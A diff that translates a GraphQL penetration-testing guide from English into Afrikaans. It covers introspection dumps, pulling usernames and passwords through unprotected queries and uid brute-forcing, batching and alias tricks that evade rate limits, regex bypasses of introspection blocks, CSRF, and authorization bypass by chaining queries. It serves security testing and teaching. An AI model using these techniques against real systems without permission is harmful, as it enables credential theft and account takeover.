-It's interesting to know if the **errors** are going to be **shown** as they will contribute with useful **information.**
+**Foute**
 
+Dit is interessant om te weet of die **foute** gaan **verskyn** aangesien dit nuttige **inligting** kan verskaf.
 ```
 ?query={__schema}
 ?query={}
 ?query={thisdefinitelydoesnotexist}
 ```
-
 ![](<../../.gitbook/assets/image (205) (1).png>)
 
-**Enumerate Database Schema via Introspection**
+**Bepaal Databasis Skema deur Introspeksie**
 
 {% hint style="info" %}
-If introspection is enabled but the above query doesn't run, try removing the `onOperation`, `onFragment`, and `onField` directives from the query structure.
+As introspeksie geaktiveer is, maar die bogenoemde navraag nie uitgevoer word nie, probeer om die `onOperation`, `onFragment`, en `onField` riglyne uit die navraagstruktuur te verwyder.
 {% endhint %}
-
 ```bash
-  #Full introspection query
+#Full introspection query
 
 query IntrospectionQuery {
-    __schema {
-        queryType {
-            name
-        }
-        mutationType {
-            name
-        }
-        subscriptionType {
-            name
-        }
-        types {
-         ...FullType
-        }
-        directives {
-            name
-            description
-            args {
-                ...InputValue
-        }
-        onOperation  #Often needs to be deleted to run query
-        onFragment   #Often needs to be deleted to run query
-        onField      #Often needs to be deleted to run query
-        }
-    }
+__schema {
+queryType {
+name
+}
+mutationType {
+name
+}
+subscriptionType {
+name
+}
+types {
+...FullType
+}
+directives {
+name
+description
+args {
+...InputValue
+}
+onOperation  #Often needs to be deleted to run query
+onFragment   #Often needs to be deleted to run query
+onField      #Often needs to be deleted to run query
+}
+}
 }
 
 fragment FullType on __Type {
-    kind
-    name
-    description
-    fields(includeDeprecated: true) {
-        name
-        description
-        args {
-            ...InputValue
-        }
-        type {
-            ...TypeRef
-        }
-        isDeprecated
-        deprecationReason
-    }
-    inputFields {
-        ...InputValue
-    }
-    interfaces {
-        ...TypeRef
-    }
-    enumValues(includeDeprecated: true) {
-        name
-        description
-        isDeprecated
-        deprecationReason
-    }
-    possibleTypes {
-        ...TypeRef
-    }
+kind
+name
+description
+fields(includeDeprecated: true) {
+name
+description
+args {
+...InputValue
+}
+type {
+...TypeRef
+}
+isDeprecated
+deprecationReason
+}
+inputFields {
+...InputValue
+}
+interfaces {
+...TypeRef
+}
+enumValues(includeDeprecated: true) {
+name
+description
+isDeprecated
+deprecationReason
+}
+possibleTypes {
+...TypeRef
+}
 }
 
 fragment InputValue on __InputValue {
-    name
-    description
-    type {
-        ...TypeRef
-    }
-    defaultValue
+name
+description
+type {
+...TypeRef
+}
+defaultValue
 }
 
 fragment TypeRef on __Type {
-    kind
-    name
-    ofType {
-        kind
-        name
-        ofType {
-            kind
-            name
-            ofType {
-                kind
-                name
-            }
-        }
-    }
+kind
+name
+ofType {
+kind
+name
+ofType {
+kind
+name
+ofType {
+kind
+name
+}
+}
+}
 }
 ```
-
-Inline introspection query:
-
+Inline introspeksie navraag:
 ```
 /?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}
 ```
-
-The last code line is a graphql query that will dump all the meta-information from the graphql (objects names, parameters, types...)
+Die laaste reël kode is 'n graphql-navraag wat alle meta-inligting van die graphql sal dump (voorwerpe name, parameters, tipes...)
 
 ![](<../../.gitbook/assets/image (206).png>)
 
-If introspection is enabled you can use [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) to view in a GUI all the options.
+As introspeksie geaktiveer is, kan jy [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) gebruik om in 'n GUI al die opsies te sien.
 
-### Querying
+### Navraag
 
-Now that we know which kind of information is saved inside the database, let's try to **extract some values**.
+Nou dat ons weet watter soort inligting binne die databasis gestoor word, laat ons probeer om **sekere waardes te onttrek**.
 
-In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
+In die introspeksie kan jy vind **watter voorwerp jy direk kan navraag doen** (omdat jy nie 'n voorwerp kan navraag doen net omdat dit bestaan nie). In die volgende prentjie kan jy sien dat die "_queryType_" "_Query_" genoem word en dat een van die velde van die "_Query_" voorwerp "_flags_" is, wat ook 'n tipe voorwerp is. Jy kan dus die vlag-voorwerp navraag doen.
 
 ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
 
-Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
+Let daarop dat die tipe van die navraag "_flags_" "_Flags_" is, en hierdie voorwerp word as volg gedefinieer:
 
 ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
 
-You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
-
+Jy kan sien dat die "_Flags_" voorwerpe saamgestel is uit **naam** en **waarde**. Jy kan dus al die name en waardes van die vlae kry met die navraag:
 ```javascript
 query={flags{name, value}}
 ```
-
-Note that in case the **object to query** is a **primitive** **type** like **string** like in the following example
+Let wel dat as die **objek om te ondervra** 'n **primitiewe** **tipe** soos **string** is, soos in die volgende voorbeeld
 
 ![](<../../.gitbook/assets/image (441).png>)
 
-You can just query is with:
-
+Jy kan dit net ondervra met:
 ```javascript
 query={hiddenFlags}
 ```
-
-In another example where there were 2 objects inside the "_Query_" type object: "_user_" and "_users_".\
-If these objects don't need any argument to search, could **retrieve all the information from them** just **asking** for the data you want. In this example from Internet you could extract the saved usernames and passwords:
+In 'n ander voorbeeld waar daar 2 voorwerpe binne die "_Query_" tipe voorwerp was: "_user_" en "_users_". As hierdie voorwerpe nie enige argument nodig het om te soek nie, kan jy **alle inligting van hulle kry** deur net vir die data te vra wat jy wil hê. In hierdie voorbeeld van die internet kan jy die gestoorde gebruikersname en wagwoorde onttrek:
 
 ![](<../../.gitbook/assets/image (208).png>)
 
-However, in this example if you try to do so you get this **error**:
+Maar in hierdie voorbeeld kry jy 'n **fout** as jy dit probeer doen:
 
 ![](<../../.gitbook/assets/image (210).png>)
 
-Looks like somehow it will search using the "_**uid**_" argument of type _**Int**_.\
-Anyway, we already knew that, in the [Basic Enumeration](graphql.md#basic-enumeration) section a query was purposed that was showing us all the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
+Dit lyk asof dit op een of ander manier sal soek deur die "_**uid**_" argument van die tipe _**Int**_ te gebruik. In elk geval het ons alreeds geweet dat in die [Basiese Enumerasie](graphql.md#basic-enumeration) afdeling 'n navraag voorgestel is wat ons al die nodige inligting gewys het: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
 
-If you read the image provided when I run that query you will see that "_**user**_" had the **arg** "_**uid**_" of type _Int_.
+As jy die verskafte prentjie lees wanneer ek daardie navraag uitvoer, sal jy sien dat "_**user**_" die **arg** "_**uid**_" van die tipe _Int_ gehad het.
 
-So, performing some light _**uid**_ bruteforce I found that in _**uid**=**1**_ a username and a password was retrieved:\
+Dus, deur 'n ligte _**uid**_ bruteforce uit te voer, het ek gevind dat in _**uid**=**1**_ 'n gebruikersnaam en 'n wagwoord opgehaal is:\
 `query={user(uid:1){user,password}}`
 
 ![](<../../.gitbook/assets/image (211).png>)
 
-Note that I **discovered** that I could ask for the **parameters** "_**user**_" and "_**password**_" because if I try to look for something that doesn't exist (`query={user(uid:1){noExists}}`) I get this error:
+Let daarop dat ek **ontdek** het dat ek vir die **parameters** "_**user**_" en "_**password**_" kon vra omdat as ek probeer soek vir iets wat nie bestaan nie (`query={user(uid:1){noExists}}`) kry ek hierdie fout:
 
 ![](<../../.gitbook/assets/image (213).png>)
 
-And during the **enumeration phase** I discovered that the "_**dbuser**_" object had as fields "_**user**_" and "_**password**_.
+En tydens die **enumerasie fase** het ek ontdek dat die "_**dbuser**_" voorwerp as velde "_**user**_" en "_**password**_ het.
 
-**Query string dump trick (thanks to @BinaryShadow\_)**
+**Navraag string dump truuk (dankie aan @BinaryShadow\_)**
 
-If you can search by a string type, like: `query={theusers(description: ""){username,password}}` and you **search for an empty string** it will **dump all data**. (_Note this example isn't related with the example of the tutorials, for this example suppose you can search using "**theusers**" by a String field called "**description**"_).
+As jy kan soek volgens 'n string tipe, soos: `query={theusers(description: ""){username,password}}` en jy **soek vir 'n leë string**, sal dit **alle data dump**. (_Let wel, hierdie voorbeeld het niks te doen met die voorbeeld van die tutoriale nie, vir hierdie voorbeeld aanvaar ons dat jy kan soek deur "**theusers**" te gebruik volgens 'n String veld genaamd "**description**"_).
 
-### Searching
+### Soek
 
-In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database.
-
-You can **search** persons **by** the **name** and get their emails:
+In hierdie opset bevat 'n **databasis** **persone** en **flieks**. **Persone** word geïdentifiseer deur hul **e-pos** en **naam**; **flieks** deur hul **naam** en **gradering**. **Persone** kan vriende wees met mekaar en het ook flieks, wat verhoudings binne die databasis aandui.
 
+Jy kan persone **soek** volgens die **naam** en hul e-posse kry:
 ```javascript
 {
-  searchPerson(name: "John Doe") {
-    email
-  }
+searchPerson(name: "John Doe") {
+email
+}
 }
 ```
-
-You can **search** persons **by** the **name** and get their **subscribed** **films**:
-
+Jy kan **soek** na persone **volgens** hul **naam** en hul **geabonneerde** **flieks** kry:
 ```javascript
 {
-  searchPerson(name: "John Doe") {
-    email
-    subscribedMovies {
-      edges {
-        node {
-          name
-        }
-      }
-    }
-  }
+searchPerson(name: "John Doe") {
+email
+subscribedMovies {
+edges {
+node {
+name
+}
+}
+}
+}
 }
 ```
+Merk op hoe dit aangedui word om die `name` van die `subscribedMovies` van die persoon te herwin.
 
-Note how its indicated to retrieve the `name` of the `subscribedMovies` of the person.
-
-You can also **search several objects at the same time**. In this case, a search 2 movies is done:
-
+Jy kan ook **veral verskeie objekte gelyktydig soek**. In hierdie geval word 'n soektog na 2 flieks gedoen:
 ```javascript
 {
-  searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
-    name
-  }
+searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
+name
+}
 }r
 ```
-
-Or even **relations of several different objects using aliases**:
-
+Of selfs **verhoudings van verskeie verskillende voorwerpe deur gebruik te maak van aliase**:
 ```javascript
 {
-  johnsMovieList: searchPerson(name: "John Doe") {
-    subscribedMovies {
-      edges {
-        node {
-          name
-        }
-      }
-    }
-  }
-  davidsMovieList: searchPerson(name: "David Smith") {
-    subscribedMovies {
-      edges {
-        node {
-          name
-        }
-      }
-    }
-  }
+johnsMovieList: searchPerson(name: "John Doe") {
+subscribedMovies {
+edges {
+node {
+name
+}
+}
+}
+}
+davidsMovieList: searchPerson(name: "David Smith") {
+subscribedMovies {
+edges {
+node {
+name
+}
+}
+}
+}
 }
 ```
+### Mutaties
 
-### Mutations
+**Mutaties word gebruik om veranderinge aan die bedienerkant te maak.**
 
-**Mutations are used to make changes in the server-side.**
-
-In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
+In die **introspeksie** kan jy die **verklaarde** **mutaties** vind. In die volgende prentjie word die "_MutationType_" genoem "_Mutation_" en die "_Mutation_" objek bevat die name van die mutasies (soos "_addPerson_" in hierdie geval):
 
 ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
 
-In this setup, a **database** contains **persons** and **movies**. **Persons** are identified by their **email** and **name**; **movies** by their **name** and **rating**. **Persons** can be friends with each other and also have movies, indicating relationships within the database.
-
-A mutation to **create new** movies inside the database can be like the following one (in this example the mutation is called `addMovie`):
+In hierdie opset bevat 'n **databasis** **persone** en **flieks**. **Persone** word geïdentifiseer deur hul **e-pos** en **naam**; **flieks** deur hul **naam** en **gradering**. **Persone** kan vriende wees met mekaar en het ook flieks, wat verhoudings binne die databasis aandui.
 
+'n Mutasie om nuwe flieks in die databasis te **skep** kan soos die volgende wees (in hierdie voorbeeld word die mutasie "addMovie" genoem):
 ```javascript
 mutation {
-  addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
-    movies {
-      name
-      rating
-    }
-  }
+addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
+movies {
+name
+rating
+}
+}
 }
 ```
+**Let daarop hoe beide die waardes en tipe van data in die navraag aangedui word.**
 
-**Note how both the values and type of data are indicated in the query.**
-
-Additionally, the database supports a **mutation** operation, named `addPerson`, which allows for the creation of **persons** along with their associations to existing **friends** and **movies**. It's crucial to note that the friends and movies must pre-exist in the database before linking them to the newly created person.
-
+Daarbenewens ondersteun die databasis 'n **mutasie**-operasie, genaamd `addPerson`, wat die skepping van **persone** saam met hul assosiasies tot bestaande **vriende** en **flieks** moontlik maak. Dit is belangrik om daarop te let dat die vriende en flieks reeds in die databasis moet bestaan voordat hulle aan die nuutgeskepte persoon gekoppel kan word.
 ```javascript
 mutation {
-  addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
-    person {
-      name
-      email
-      friends {
-        edges {
-          node {
-            name
-            email
-          }
-        }
-      }
-      subscribedMovies {
-        edges {
-          node {
-            name
-            rating
-            releaseYear
-          }
-        }
-      }
-    }
-  }
+addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
+person {
+name
+email
+friends {
+edges {
+node {
+name
+email
+}
+}
+}
+subscribedMovies {
+edges {
+node {
+name
+rating
+releaseYear
+}
+}
+}
+}
+}
 }
 ```
-
 ### Batching brute-force in 1 API request
 
-This information was take from [https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/).\
-Authentication through GraphQL API with **simultaneously sending many queries with different credentials** to check it. It’s a classic brute force attack, but now it’s possible to send more than one login/password pair per HTTP request because of the GraphQL batching feature. This approach would trick external rate monitoring applications into thinking all is well and there is no brute-forcing bot trying to guess passwords.
+Hierdie inligting is geneem vanaf [https://lab.wallarm.com/graphql-batching-attack/](https://lab.wallarm.com/graphql-batching-attack/).\
+Verifikasie deur middel van GraphQL API met **gelyktydige stuur van baie navrae met verskillende geloofsbriewe** om dit te toets. Dit is 'n klassieke brute force-aanval, maar nou is dit moontlik om meer as een login/wagwoord-paar per HTTP-aanvraag te stuur as gevolg van die GraphQL-batchingfunksie. Hierdie benadering sal eksterne tariefmoniteringsprogramme laat dink dat alles reg is en dat daar geen brute force-bot is wat wagwoorde probeer raai nie.
 
-Below you can find the simplest demonstration of an application authentication request, with **3 different email/passwords pairs at a time**. Obviously it’s possible to send thousands in a single request in the same way:
+Hieronder vind jy die eenvoudigste demonstrasie van 'n aansoekverifikasie-aanvraag, met **3 verskillende e-pos/wagwoord-pare op 'n slag**. Dit is vanselfsprekend moontlik om duisende in een enkele aanvraag op dieselfde manier te stuur:
 
 ![](<../../.gitbook/assets/image (182) (1).png>)
 
-As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
+Soos ons kan sien uit die antwoordskermkiekie, het die eerste en derde aanvrae _null_ teruggegee en die ooreenstemmende inligting in die _error_ -gedeelte weerspieël. Die **tweede mutasie het die korrekte verifikasie** -data gehad en die antwoord het die korrekte verifikasie-sessie-token.
 
 ![](<../../.gitbook/assets/image (119) (1).png>)
 
-## GraphQL Without Introspection
+## GraphQL Sonder Introspeksie
 
-More and more **graphql endpoints are disabling introspection**. However, the errors that graphql throws when an unexpected request is received are enough for tools like [**clairvoyance**](https://github.com/nikitastupin/clairvoyance) to recreate most part of the schema.
+Meer en meer **graphql-eindpunte deaktiveer introspeksie**. Die foute wat graphql gooi wanneer 'n onverwagte versoek ontvang word, is egter genoeg vir gereedskap soos [**clairvoyance**](https://github.com/nikitastupin/clairvoyance) om die meeste van die skema te herskep.
 
-Moreover, the Burp Suite extension [**GraphQuail**](https://github.com/forcesunseen/graphquail) extension **observes GraphQL API requests going through Burp** and **builds** an internal GraphQL **schema** with each new query it sees. It can also expose the schema for GraphiQL and Voyager. The extension returns a fake response when it receives an introspection query. As a result, GraphQuail shows all queries, arguments, and fields available for use within the API. For more info [**check this**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema).
+Verder, die Burp Suite-uitbreiding [**GraphQuail**](https://github.com/forcesunseen/graphquail) **observeer GraphQL API-aanvrae wat deur Burp gaan** en **bou** 'n interne GraphQL **skema** met elke nuwe navraag wat dit sien. Dit kan ook die skema blootstel vir GraphiQL en Voyager. Die uitbreiding gee 'n vals antwoord wanneer dit 'n introspeksie-navraag ontvang. As gevolg hiervan wys GraphQuail alle navrae, argumente en velde wat beskikbaar is vir gebruik binne die API. Vir meer inligting [**kyk hierdie**](https://blog.forcesunseen.com/graphql-security-testing-without-a-schema).
 
-A nice **wordlist** to discover [**GraphQL entities can be found here**](https://github.com/Escape-Technologies/graphql-wordlist?).
+'n Goeie **woordelys** om [**GraphQL-entiteite te ontdek kan hier gevind word**](https://github.com/Escape-Technologies/graphql-wordlist?).
 
 ### Bypassing GraphQL introspection defences 
 
 ### **Bypassing GraphQL Introspection Defenses**
 
-To bypass restrictions on introspection queries in APIs, inserting a **special character after the `__schema` keyword** proves effective. This method exploits common developer oversights in regex patterns that aim to block introspection by focusing on the `__schema` keyword. By adding characters like **spaces, new lines, and commas**, which GraphQL ignores but might not be accounted for in regex, restrictions can be circumvented. For instance, an introspection query with a newline after `__schema` may bypass such defenses:
-
+Om beperkings op introspeksie-navrae in API's te omseil, is dit effektief om 'n **spesiale karakter na die `__schema` sleutelwoord** in te voeg. Hierdie metode maak gebruik van algemene ontwikkelaarsoorsigte in regex-patrone wat daarop gemik is om introspeksie te blokkeer deur te fokus op die `__schema` sleutelwoord. Deur karakters soos **spasies, nuwe lyne en kommas** by te voeg, wat GraphQL ignoreer maar moontlik nie in regex verreken word nie, kan beperkings omseil word. Byvoorbeeld, 'n introspeksie-navraag met 'n nuwe lyn na `__schema` mag sulke verdedigings omseil:
 ```bash
 # Example with newline to bypass
-{ 
-    "query": "query{__schema
-    {queryType{name}}}"
+{
+"query": "query{__schema
+{queryType{name}}}"
 }
 ```
+Indien onsuksesvol, oorweeg alternatiewe versoekmetodes, soos **GET-versoeke** of **POST met `x-www-form-urlencoded`**, aangesien beperkings moontlik slegs op POST-versoeke van toepassing kan wees.
 
-If unsuccessful, consider alternative request methods, such as **GET requests** or **POST with `x-www-form-urlencoded`**, since restrictions may apply only to POST requests.
-
-### **Discovering Exposed GraphQL Structures**
-
-When introspection is disabled, examining the website's source code for preloaded queries in JavaScript libraries is a useful strategy. These queries can be found using the `Sources` tab in developer tools, providing insights into the API's schema and revealing potentially **exposed sensitive queries**. The commands to search within the developer tools are:
+### **Ontdekking van Blootgestelde GraphQL-Strukture**
 
+Wanneer introspeksie gedeaktiveer is, is dit 'n nuttige strategie om die bronkode van die webwerf te ondersoek vir vooraf gelaaide navrae in JavaScript-biblioteke. Hierdie navrae kan gevind word deur die `Bronne`-tabblad in die ontwikkelaarshulpmiddels te gebruik, wat insig gee in die API se skema en moontlik **blootgestelde sensitiewe navrae** onthul. Die opdragte om binne die ontwikkelaarshulpmiddels te soek, is:
 ```javascript
 Inspect/Sources/"Search all files"
 file:* mutation
 file:* query
 ```
-
 ## CSRF in GraphQL
 
-If you don't know what CSRF is read the following page:
+As jy nie weet wat CSRF is nie, lees die volgende bladsy:
 
 {% content-ref url="../../pentesting-web/csrf-cross-site-request-forgery.md" %}
 [csrf-cross-site-request-forgery.md](../../pentesting-web/csrf-cross-site-request-forgery.md)
 {% endcontent-ref %}
 
-Out there you are going to be able to find several GraphQL endpoints **configured without CSRF tokens.**
-
-Note that GraphQL request are usually sent via POST requests using the Content-Type **`application/json`**.
+Daar buite sal jy verskeie GraphQL-eindpunte vind wat **gekonfigureer is sonder CSRF-tokens**.
 
+Let daarop dat GraphQL-versoeke gewoonlik gestuur word deur POST-versoeke te gebruik met die Content-Type **`application/json`**.
 ```javascript
 {"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}
 ```
-
-However, most GraphQL endpoints also support **`form-urlencoded` POST requests:**
-
+Echter, die meeste GraphQL eindpunte ondersteun ook **`form-urlencoded` POST-aanvrae:**
 ```javascript
 query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
 ```
+Daarom, aangesien CSRF-versoeke soos die vorige een **sonder vooraanvraagversoeke** gestuur word, is dit moontlik om **veranderings** in die GraphQL te maak deur 'n CSRF te misbruik.
 
-Therefore, as CSRF requests like the previous ones are sent **without preflight requests**, it's possible to **perform** **changes** in the GraphQL abusing a CSRF.
+Let egter daarop dat die nuwe verstekkoekiewaarde van die `samesite`-vlag van Chrome `Lax` is. Dit beteken dat die koekie slegs gestuur sal word van 'n derde party-web in GET-versoeke.
 
-However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests.
+Let daarop dat dit gewoonlik moontlik is om die **navraagversoek** ook as 'n **GET**-versoek te stuur en die CSRF-token mag nie in 'n GET-versoek gevalideer word nie.
 
-Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.**
+Daarbenewens kan dit moontlik wees om inhoud van die GraphQL-eindpunt te eksfiltreer deur die gebruikerslegitimasie te misbruik deur 'n [**XS-Soek**](../../pentesting-web/xs-search.md) **aanval** te misbruik.
 
-Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user.
+Vir meer inligting, **kyk na die** [**oorspronklike berig hier**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
 
-For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
+## Magtiging in GraphQL
 
-## Authorization in GraphQL
+Baie GraphQL-funksies wat op die eindpunt gedefinieer is, mag slegs die outentifikasie van die versoeker nagaan, maar nie magtiging nie.
 
-Many GraphQL functions defined on the endpoint might only check the authentication of the requester but not authorization.
-
-Modifying query input variables could lead to sensitive account details [leaked](https://hackerone.com/reports/792927).
-
-Mutation could even lead to account takeover trying to modify other account data.
+Die wysiging van navraaginskrywingsveranderlikes kan lei tot die **uitlek** van sensitiewe rekeningbesonderhede [leaked](https://hackerone.com/reports/792927).
 
+Mutering kan selfs lei tot rekeningsoorname deur te probeer om ander rekeningdata te wysig.
 ```javascript
 {
-  "operationName":"updateProfile",
-  "variables":{"username":INJECT,"data":INJECT},
-  "query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
+"operationName":"updateProfile",
+"variables":{"username":INJECT,"data":INJECT},
+"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
 }
 ```
+### Omseil outorisasie in GraphQL
 
-### Bypass authorization in GraphQL
+[Deur navrae aan mekaar te koppel](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln) kan 'n swak outentifikasie stelsel omseil word.
 
-[Chaining queries](https://s1n1st3r.gitbook.io/theb10g/graphql-query-authentication-bypass-vuln) together can bypass a weak authentication system.
-
-In the below example you can see that the operation is "forgotPassword" and that it should only execute the forgotPassword query associated with it. This can be bypassed by adding a query to the end, in this case we add "register" and a user variable for the system to register as a new user.
+In die onderstaande voorbeeld kan jy sien dat die operasie "forgotPassword" is en dat dit slegs die forgotPassword navraag wat daarmee geassosieer word, moet uitvoer. Dit kan omseil word deur 'n navraag aan die einde toe te voeg, in hierdie geval voeg ons "register" en 'n gebruikersveranderlike by sodat die stelsel dit as 'n nuwe gebruiker kan registreer.
 
 

 
-## Bypassing Rate Limits Using Aliases in GraphQL
+## Omseilings van tariefgrense deur gebruik te maak van aliase in GraphQL
 
-In GraphQL, aliases are a powerful feature that allow for the **naming of properties explicitly** when making an API request. This capability is particularly useful for retrieving **multiple instances of the same type** of object within a single request. Aliases can be employed to overcome the limitation that prevents GraphQL objects from having multiple properties with the same name.
+In GraphQL is aliase 'n kragtige funksie wat dit moontlik maak om **eienskappe eksplisiet te benoem** wanneer 'n API-versoek gedoen word. Hierdie vermoë is veral nuttig vir die herwinning van **veralgehele van dieselfde tipe** objek binne 'n enkele versoek. Aliase kan gebruik word om die beperking te oorkom wat voorkom dat GraphQL-objekte meerdere eienskappe met dieselfde naam het.
 
-For a detailed understanding of GraphQL aliases, the following resource is recommended: [Aliases](https://portswigger.net/web-security/graphql/what-is-graphql#aliases).
+Vir 'n gedetailleerde begrip van GraphQL aliase, word die volgende bron aanbeveel: [Aliase](https://portswigger.net/web-security/graphql/what-is-graphql#aliases).
 
-While the primary purpose of aliases is to reduce the necessity for numerous API calls, an unintended use case has been identified where aliases can be leveraged to execute brute force attacks on a GraphQL endpoint. This is possible because some endpoints are protected by rate limiters designed to thwart brute force attacks by restricting the **number of HTTP requests**. However, these rate limiters might not account for the number of operations within each request. Given that aliases allow for the inclusion of multiple queries in a single HTTP request, they can circumvent such rate limiting measures.
-
-Consider the example provided below, which illustrates how aliased queries can be used to verify the validity of store discount codes. This method could sidestep rate limiting since it compiles several queries into one HTTP request, potentially allowing for the verification of numerous discount codes simultaneously.
+Terwyl die primêre doel van aliase is om die noodsaaklikheid van talle API-aanroepe te verminder, is daar 'n onbedoelde gebruik waar aliase gebruik kan word om brute force aanvalle op 'n GraphQL-eindpunt uit te voer. Dit is moontlik omdat sommige eindpunte beskerm word deur tariefgrense wat ontwerp is om brute force aanvalle te beperk deur die **aantal HTTP-versoeke** te beperk. Hierdie tariefgrense hou egter nie rekening met die aantal operasies binne elke versoek nie. Gegewe dat aliase die insluiting van verskeie navrae in 'n enkele HTTP-versoek toelaat, kan dit sulke tariefgrense omseil.
 
+Oorweeg die onderstaande voorbeeld wat illustreer hoe gealiaseerde navrae gebruik kan word om die geldigheid van winkel afslagkodes te verifieer. Hierdie metode kan tariefgrense omseil deurdat dit verskeie navrae in een HTTP-versoek saamstel, wat moontlik maak om gelyktydig die geldigheid van verskeie afslagkodes te verifieer.
 ```bash
 # Example of a request utilizing aliased queries to check for valid discount codes
 query isValidDiscount($code: Int) {
-    isvalidDiscount(code:$code){
-        valid
-    }
-    isValidDiscount2:isValidDiscount(code:$code){
-        valid
-    }
-    isValidDiscount3:isValidDiscount(code:$code){
-        valid
-    }
+isvalidDiscount(code:$code){
+valid
+}
+isValidDiscount2:isValidDiscount(code:$code){
+valid
+}
+isValidDiscount3:isValidDiscount(code:$code){
+valid
+}
 }
 ```
+## Gereedskap
 
-## Tools
+### Kwesbaarheidsskanners
 
-### Vulnerability scanners
+* [https://github.com/gsmith257-cyber/GraphCrawler](https://github.com/gsmith257-cyber/GraphCrawler): Toolkit wat gebruik kan word om skemas te gryp en te soek vir sensitiewe data, toets outorisasie, skema-bruteforce, en paaie na 'n gegewe tipe te vind.
+* [https://blog.doyensec.com/2020/03/26/graphql-scanner.html](https://blog.doyensec.com/2020/03/26/graphql-scanner.html): Kan gebruik word as 'n afsonderlike of [Burp-uitbreiding](https://github.com/doyensec/inql).
